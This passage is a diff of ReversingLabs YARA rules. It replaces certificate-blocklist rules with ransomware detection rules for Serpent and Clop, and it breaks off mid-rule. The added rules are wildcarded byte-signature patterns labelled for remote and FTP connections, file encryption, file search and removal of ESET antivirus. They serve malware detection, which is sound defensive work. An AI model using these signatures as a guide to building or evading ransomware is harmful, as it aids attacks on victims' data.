+            05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
+            8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB
+            BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45
+            ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45
+            ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Company Babylon" and ( pe.signatures [ i ] . serial == "00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures [ i ] . serial == "be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" ) and 1589146251 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files and $encrypt_files and $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Serpent ransomware."
 		author = "ReversingLabs"
-		id = "de734943-e735-5895-b76e-5f8588a77540"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4198-L4214"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2"
+		logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Serpent"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$do_dll_stuff_and_create_thread = {
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA
+            ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B
+            75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B
+            75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B
+            75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ??
+            ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ??
+            6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33
+            C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ??
+            90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ??
+            C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F
+            31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9
+            89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45
+            ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ??
+            81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89
+            85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ??
+            89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ??
+            ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7
+            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ??
+            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA
+            ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$remote_ftp_connection = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66
+            8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ??
+            ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9
+            ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80
+            ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74
+            ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8
+            ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83
+            ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45
+            ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88
+            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18
+            FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ??
+            80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ??
+            8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8
+            ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ??
+            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ??
+            ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D
+            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45
+            ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ??
+            ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ??
+            8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection
 }
-
-rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Clop ransomware."
 		author = "ReversingLabs"
-		id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0ea63119-3773-5404-b332-8e3966fd35df"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4216-L4232"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d"
+		logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Clop"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ??
+            ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ??
+            ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B
+            91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ??
+            ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
+            ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 FF 15
+        }
+		$encrypt_files_p2 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D
+            4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ??
+            68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D
+            ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ??
+            ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C2
+        }
+		$encrypt_files_p3 = {
+            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B
+            4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ??
+            51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3
+        }
+		$find_files = {
+            8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ??
+            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8
+        }
+		$uninstall_eset_av = {
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ??
